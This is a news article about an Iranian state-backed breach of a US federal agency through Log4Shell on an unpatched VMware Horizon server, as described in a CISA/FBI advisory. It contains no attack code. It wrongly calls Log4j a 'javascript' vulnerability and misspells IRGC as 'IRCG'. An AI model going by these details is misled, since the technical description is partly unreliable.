View all newsletters
Receive our newsletter - data, insights and analysis delivered to you
  1. Technology
  2. Cybersecurity
November 17, 2022

Iran’s state-sponsored hackers use Log4J to target US government

A government department was breached using the common javascript vulnerability, CISA and the FBI have confirmed.

By Claudia Glover

Hackers funded by the government in Iran carried out a cyberattack on a US federal agency using infamous javascript vulnerability Log4shell to harvest credentials. Other organisations are being warned to immediately apply patches to affected VMware servers. 

State-sponsored hackers from Iran have been targeting a US government agency. (Photo by Kanisorn Pringthongfoo/Shutterstock)

A “federal civilian executive branch organisation” (FCEB) was breached by Iranian hackers in February, according to an alert issued by America’s Cybersecurity and Infrastructure Security Agency (CISA) and the FBI. The agency has not been named the agency in question, but FCEBs listed on the CISA website include all major US government departments.

Iranians hack Federal Agency with Log4shell

The unnamed Iranian state-backed hacking gang exploited Log4shell for initial access into the organisation’s unpatched VMware Horizon server. Once in, they installed cryptomining software and harvested for credentials. 

Both the FBI and CISA are warning organisations “to assume compromise and initiate threat-hunting activities,” by patching affected VMware systems or applying workarounds immediately. The FBI is encouraging any affected organisations to “assume lateral movement by threat actors”, in their networks, and to audit privileged accounts. 

CISA uncovered the intrusion during a retrospective analysis carried out in April. “By exploiting Log4shell, the actors gained access to a VMWare account with administrator and system level access,” reads the advisory.

Iran’s cyberattack on US and its allies continues

Iranian-state-backed hackers regularly attack public sector organisations and elements of critical national infrastructure of the US and its allies using popular vulnerabilities like Log4shell. In September, the FBI and CISA released a warning in conjunction with the NSA, the Treasury, the US Cyber Command (USCC) and the UK’s National Cyber Security Centre (NCSC) warning the public about the Iranian Government’s Islamic Revolutionary Guard Corps (IRGC).

The IRCG is a government agency tasked with “defending the Iranian Regime from perceived internal and external threats,” notes the advisory. The IRGC is a well-documented user of the VMware Log4shell vulnerability, and has been known to exploit several high-profile flaws in Microsoft’s Exchange Server which have been unearthed this year.

Content from our partners
Green for go: Transforming trade in the UK
Manufacturers are switching to personalised customer experience amid fierce competition
How many ends in end-to-end service orchestration?

Iran has been upping the ante this year regarding cyberattacks, warns the 2022 Microsoft Cyber Defense report, with the US and Israel in its crosshairs. “By 2022, Iranian cyberattacks escalated in target selection and form of attacks,” the report says, adding: “Microsoft assesses an Iran-affiliated actor was most likely responsible for a sophisticated cyberattack that set off emergency rocket sirens in Israel in June probably by using software that adjusts audio over IP networks.” 

This threat is unlikely to abate. In fact, it will probably become more pronounced, continues the report. “Iranian actors are likely to remain a threat to US and Israeli transportation and energy companies in the coming year.” 

Read more: Microsoft Office 365 vulnerability leaves cloud data open to ransomware attack

Websites in our network
Select and enter your corporate email address Tech Monitor's research, insight and analysis examines the frontiers of digital transformation to help tech leaders navigate the future. Our Changelog newsletter delivers our best work to your inbox every week.
  • CIO
  • CTO
  • CISO
  • CSO
  • CFO
  • CDO
  • CEO
  • Architect Founder
  • MD
  • Director
  • Manager
  • Other
Visit our privacy policy for more information about our services, how New Statesman Media Group may use, process and share your personal data, including information on your rights in respect of your personal data and how you can unsubscribe from future marketing communications. Our services are intended for corporate subscribers and you warrant that the email address submitted is your corporate email address.